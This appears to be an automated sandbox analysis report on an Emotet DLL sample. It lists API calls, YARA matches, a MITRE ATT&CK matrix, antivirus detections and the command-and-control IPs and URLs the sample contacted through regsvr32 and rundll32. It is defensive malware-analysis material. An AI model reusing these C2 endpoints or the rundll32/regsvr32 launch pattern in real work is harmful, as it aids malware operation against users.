                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1001FBB5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_1001FBB5
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1002C912 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,2_2_1002C912
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100206F8 GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,__initptd,GetCurrentThreadId,__freeptd,2_2_100206F8
                      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1001FBB5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_1001FBB5
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1002ACAB __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_1002ACAB
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10024E50 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_10024E50
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10027FD8 SetUnhandledExceptionFilter,__encode_pointer,2_2_10027FD8
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10027FFA __decode_pointer,SetUnhandledExceptionFilter,2_2_10027FFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001FBB5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_1001FBB5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002ACAB __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_1002ACAB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10024E50 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_10024E50
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10027FD8 SetUnhandledExceptionFilter,__encode_pointer,3_2_10027FD8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10027FFA __decode_pointer,SetUnhandledExceptionFilter,3_2_10027FFA

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 217.182.25.250 8080Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 70.36.102.35 443Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 51.91.76.89 8080Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 119.193.124.41 7080Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 92.240.254.110 8080Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\xhOJLzQSe7.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,2_2_1002E7D0
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,2_2_10032820
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,2_2_10005CE3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,3_2_1002E7D0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,3_2_10032820
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,3_2_10005CE3
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1002DE74 cpuid 2_2_1002DE74
                      Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10027ED8 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,2_2_10027ED8
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1002C0EA __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,2_2_1002C0EA
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100206F8 GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,__initptd,GetCurrentThreadId,__freeptd,2_2_100206F8

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Emotet
                      Source: Yara matchFile source: 3.2.rundll32.exe.bb0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.c10000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.bb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.3280000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.2e00000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.3250000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.43f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.3250000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.2e00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.c00000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.2f00000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.c10000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.972201454.0000000002F01000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.471795717.00000000043F1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.465962452.0000000000C01000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.466876693.0000000003250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.471763679.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.465829043.0000000000BB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.466979688.0000000003281000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.972129886.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts1
                      Native API                      		1
                      DLL Side-Loading                      		111
                      Process Injection                      		2
                      Masquerading                      		2
                      Input Capture                      		2
                      System Time Discovery                      		Remote Services2
                      Input Capture                      		Exfiltration Over Other Network Medium12
                      Encrypted Channel                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      DLL Side-Loading                      		3
                      Virtualization/Sandbox Evasion                      		LSASS Memory41
                      Security Software Discovery                      		Remote Desktop Protocol1
                      Archive Collected Data                      		Exfiltration Over Bluetooth1
                      Non-Standard Port                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)111
                      Process Injection                      		Security Account Manager3
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration11
                      Application Layer Protocol                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                      Deobfuscate/Decode Files or Information                      		NTDS1
                      Process Discovery                      		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Hidden Files and Directories                      		LSA Secrets1
                      Application Window Discovery                      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common2
                      Obfuscated Files or Information                      		Cached Domain Credentials1
                      Remote System Discovery                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                      Regsvr32                      		DCSync2
                      File and Directory Discovery                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      Rundll32                      		Proc Filesystem45
                      System Information Discovery                      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                      DLL Side-Loading                      		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                      File Deletion                      		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 669375 Sample: xhOJLzQSe7 Startdate: 20/07/2022 Architecture: WINDOWS Score: 100 30 136.31.0.0 WEBPASSUS United States 2->30 32 120.16.251.2 VODAFONE-AS-APVodafoneAustraliaPtyLtdAU Australia 2->32 34 26 other IPs or domains 2->34 48 Snort IDS alert for network traffic 2->48 50 Antivirus detection for URL or domain 2->50 52 Antivirus / Scanner detection for submitted sample 2->52 54 3 other signatures 2->54 8 loaddll32.exe 1 2->8         started        10 svchost.exe 9 1 2->10         started        13 svchost.exe 2->13         started        15 4 other processes 2->15 signatures3 process4 dnsIp5 17 regsvr32.exe 5 8->17         started        20 cmd.exe 1 8->20         started        22 rundll32.exe 2 8->22         started        42 127.0.0.1 unknown unknown 10->42 44 192.168.2.1 unknown unknown 13->44 process6 signatures7 46 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->46 24 regsvr32.exe 17->24         started        28 rundll32.exe 2 20->28         started        process8 dnsIp9 36 70.36.102.35, 443, 49766, 49767 PERFECT-INTERNATIONALUS United States 24->36 38 217.182.25.250, 49822, 8080 OVHFR France 24->38 40 3 other IPs or domains 24->40 56 System process connects to network (likely due to code injection or exploit) 24->56 58 Hides that the sample has been downloaded from the Internet (zone.identifier) 28->58 signatures10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      xhOJLzQSe7.dll70%VirustotalBrowse
                      xhOJLzQSe7.dll100%AviraTR/Emotet.uwcip

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      2.2.regsvr32.exe.c10000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      6.2.regsvr32.exe.2e00000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      6.2.regsvr32.exe.2f00000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      4.2.rundll32.exe.3280000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      3.2.rundll32.exe.c00000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      3.2.rundll32.exe.bb0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      4.2.rundll32.exe.3250000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      2.2.regsvr32.exe.43f0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://92.240.254.110:8080/i0%Avira URL Cloudsafe
                      https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                      https://92.240.254.110:8080/OozwNWoXrNLqNNtlQCBStrfsHlZQDyVVCeVUrhuzIDQnbSNZedOwyJtV60%Avira URL Cloudsafe
                      https://119.193.124.41:7080/yNzUEhYRmfobVpbnIjDAnFfZFoBrGzwALuEiEPb0%Avira URL Cloudsafe
                      https://51.91.76.89:8080/wILlkzMrsIIqrWuKTJoVXizoHkadIszFHcIlGojhnBcDobePKzyquq100%Avira URL Cloudmalware
                      https://70.36.102.35/100%Avira URL Cloudmalware
                      https://119.193.124.41:7080/yNzUEhYRmfobVpbnIjDAnFfZFoBrGzwALuEiEPb1T0%Avira URL Cloudsafe
                      https://92.240.254.110/t0%Avira URL Cloudsafe
                      http://crl.ver)0%Avira URL Cloudsafe
                      https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                      https://119.193.124.41:7080/yNzUEhYRmfobVpbnIjDAnFfZFoBrGzwALuEiEPb#T0%Avira URL Cloudsafe
                      https://217.182.25.250:8080/wyXUykQBFXLgUDhBPADNipDGWMKugALsfbonBqKseR0%Avira URL Cloudsafe
                      https://70.36.102.35/lKdeDesHKlwQRuBQoJMtzzkSkkKhWjwq100%Avira URL Cloudmalware
                      https://92.240.254.110:8080/0%Avira URL Cloudsafe
                      https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                      https://217.182.25.250:8080/wyXUykQBFXLgUDhBPADNipDGWMKugALsfbonBqKseR90%Avira URL Cloudsafe
                      https://70.36.102.35/lKdeDesHKlwQRuBQoJMtzzkSkkKhWjw100%Avira URL Cloudmalware
                      https://51.91.76.89:8080/wILlkzMrsIIqrWuKTJoVXizoHkadIszFHcIlGojhnBcDobePKzyquq9100%Avira URL Cloudmalware
                      https://92.240.254.110:8080/OozwNWoXrNLqNNtlQCBStrfsHlZQDyVVCeVUrhuzIDQnbSNZedOwyJtV0%Avira URL Cloudsafe
                      https://217.182.25.250/60%Avira URL Cloudsafe
                      https://51.91.76.89/100%Avira URL Cloudmalware
                      https://www.pango.co/privacy0%URL Reputationsafe
                      https://disneyplus.com/legal.0%URL Reputationsafe
                      https://119.193.124.41/0%Avira URL Cloudsafe
                      https://217.182.25.250/0%Avira URL Cloudsafe
                      https://92.240.254.110/0%Avira URL Cloudsafe
                      http://help.disneyplus.com.0%URL Reputationsafe
                      https://70.36.102.35/Default100%Avira URL Cloudmalware
                      https://119.193.124.41:7080/yNzUEhYRmfobVpbnIjDAnFfZFoBrGzwALuEiEPbV0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://92.240.254.110:8080/iregsvr32.exe, 00000006.00000003.552349353.0000000002FAB000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 00000015.00000003.767387577.0000020F4E37B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.767327941.0000020F4E398000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://92.240.254.110:8080/OozwNWoXrNLqNNtlQCBStrfsHlZQDyVVCeVUrhuzIDQnbSNZedOwyJtV6regsvr32.exe, 00000006.00000002.972587978.0000000002FC7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.564257822.0000000002FC7000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://119.193.124.41:7080/yNzUEhYRmfobVpbnIjDAnFfZFoBrGzwALuEiEPbregsvr32.exe, 00000006.00000002.972404800.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.972295392.0000000002F3A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.564199843.0000000002F88000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://51.91.76.89:8080/wILlkzMrsIIqrWuKTJoVXizoHkadIszFHcIlGojhnBcDobePKzyquqregsvr32.exe, 00000006.00000002.972404800.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.564199843.0000000002F88000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      https://70.36.102.35/regsvr32.exe, 00000006.00000003.506754073.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.552349353.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.972404800.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.564199843.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.506733124.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.552291019.0000000002F88000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      https://119.193.124.41:7080/yNzUEhYRmfobVpbnIjDAnFfZFoBrGzwALuEiEPb1Tregsvr32.exe, 00000006.00000002.972295392.0000000002F3A000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://92.240.254.110/tregsvr32.exe, 00000006.00000003.552349353.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.972404800.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.564199843.0000000002F88000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://crl.ver)svchost.exe, 00000008.00000002.840794935.00000257CCC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.799488078.0000020F4DAE9000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      https://www.tiktok.com/legal/report/feedbacksvchost.exe, 00000015.00000003.771381314.0000020F4E802000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.771276935.0000020F4E3AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.771350523.0000020F4E37B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.771307358.0000020F4E398000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://119.193.124.41:7080/yNzUEhYRmfobVpbnIjDAnFfZFoBrGzwALuEiEPb#Tregsvr32.exe, 00000006.00000002.972295392.0000000002F3A000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://217.182.25.250:8080/wyXUykQBFXLgUDhBPADNipDGWMKugALsfbonBqKseRregsvr32.exe, 00000006.00000002.972587978.0000000002FC7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.564257822.0000000002FC7000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://70.36.102.35/lKdeDesHKlwQRuBQoJMtzzkSkkKhWjwqregsvr32.exe, 00000006.00000003.506754073.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.552349353.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.972404800.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.564199843.0000000002F88000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      https://support.hotspotshield.com/svchost.exe, 00000015.00000003.764113869.0000020F4E378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.762818013.0000020F4E3A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.762692728.0000020F4E802000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.762844012.0000020F4E802000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.762785842.0000020F4E398000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.764136260.0000020F4E37B000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://92.240.254.110:8080/regsvr32.exe, 00000006.00000003.552349353.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.552388525.0000000002F92000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.552291019.0000000002F88000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.disneyplus.com/legal/privacy-policysvchost.exe, 00000015.00000003.767387577.0000020F4E37B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.767327941.0000020F4E398000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://217.182.25.250:8080/wyXUykQBFXLgUDhBPADNipDGWMKugALsfbonBqKseR9regsvr32.exe, 00000006.00000002.972587978.0000000002FC7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.564257822.0000000002FC7000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://70.36.102.35/lKdeDesHKlwQRuBQoJMtzzkSkkKhWjwregsvr32.exe, 00000006.00000003.506754073.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.552349353.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.972404800.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.564199843.0000000002F88000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://51.91.76.89:8080/wILlkzMrsIIqrWuKTJoVXizoHkadIszFHcIlGojhnBcDobePKzyquq9regsvr32.exe, 00000006.00000002.972404800.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.564199843.0000000002F88000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://92.240.254.110:8080/OozwNWoXrNLqNNtlQCBStrfsHlZQDyVVCeVUrhuzIDQnbSNZedOwyJtVregsvr32.exe, 00000006.00000003.552349353.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.972404800.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.564199843.0000000002F88000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://217.182.25.250/6regsvr32.exe, 00000006.00000002.972404800.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.564199843.0000000002F88000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://51.91.76.89/regsvr32.exe, 00000006.00000002.972404800.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.564199843.0000000002F88000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://www.hotspotshield.com/terms/svchost.exe, 00000015.00000003.764113869.0000020F4E378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.762818013.0000020F4E3A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.762692728.0000020F4E802000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.762844012.0000020F4E802000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.762785842.0000020F4E398000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.764136260.0000020F4E37B000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://www.pango.co/privacysvchost.exe, 00000015.00000003.764113869.0000020F4E378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.762818013.0000020F4E3A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.762692728.0000020F4E802000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.762844012.0000020F4E802000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.762785842.0000020F4E398000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.764136260.0000020F4E37B000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
